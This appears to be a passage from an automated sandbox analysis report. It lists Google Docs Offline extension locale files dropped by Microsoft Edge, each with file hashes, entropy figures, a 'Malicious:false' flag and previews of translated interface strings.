                                                                                                                                                                                                                                                                                          SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                          MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                          SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                          SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                          SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                          MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                          SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                          SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                          SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1042
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                          MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                          SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                          SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                          SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                          MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                          SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                          SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                          SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                          MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                          SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                          SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                          SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                          MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                          SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                          SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                          SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                          MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                          SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                          SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                          SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                          MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                          SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                          SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                          SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
